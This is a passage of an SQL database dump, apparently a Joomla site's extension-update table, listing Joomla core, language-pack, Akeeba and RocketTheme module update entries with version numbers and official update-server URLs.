CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3121,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3122,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3123,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3124,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3125,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3126,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3127,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(3129,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3130,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3131,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3132,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3133,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3134,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3135,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3136,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3137,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3138,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3139,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3140,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3141,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3142,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3143,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3144,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3145,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3146,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3147,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3148,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3149,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3150,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3151,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3152,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3153,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3154,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3155,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3156,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3157,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3158,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3159,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3160,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3161,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3162,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3163,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3164,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3165,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3166,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3167,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3168,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3169,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3170,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3171,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3172,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3173,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3174,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3175,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3176,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3177,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3178,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3179,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3180,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3181,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3182,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3183,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3184,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3185,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3186,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3187,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3188,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3189,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3190,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3191,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3192,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3193,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3194,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3195,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3196,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3197,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3198,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3199,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3200,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3201,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3202,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3203,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3204,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3205,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3206,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3207,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3208,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3209,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3210,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3211,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3212,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3213,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3214,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3215,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3216,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3217,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3218,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3219,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3220,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3221,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3222,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3223,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3224,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3225,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3226,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3227,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3228,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(3229,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3230,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3231,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3232,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3233,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3234,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3235,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3236,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3237,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3238,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3239,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3240,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3241,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3242,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3243,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3244,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3245,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3246,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3247,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3248,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3249,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3250,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3251,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3252,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3253,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3254,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3255,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3256,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3257,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3258,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3259,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3260,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3261,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3262,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3263,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3264,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3265,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3266,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3267,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3268,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3269,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3270,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3271,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3272,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3273,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3274,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3275,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3276,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3277,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3278,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3279,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3280,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3281,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3282,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3283,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3284,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3285,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3286,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3287,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3288,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3289,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3290,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3291,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3292,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3293,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3294,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3295,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3296,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3297,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3298,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3299,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3300,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3301,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3302,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3303,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3304,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3305,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3306,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3307,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3308,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3309,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3310,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3311,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3312,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3313,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3314,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3315,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3316,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3317,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3318,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3319,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3320,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3321,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3322,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3323,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3324,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3325,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3326,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3327,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3328,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3329,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3330,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3331,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3332,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3333,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3334,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3335,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3336,57,0,'English 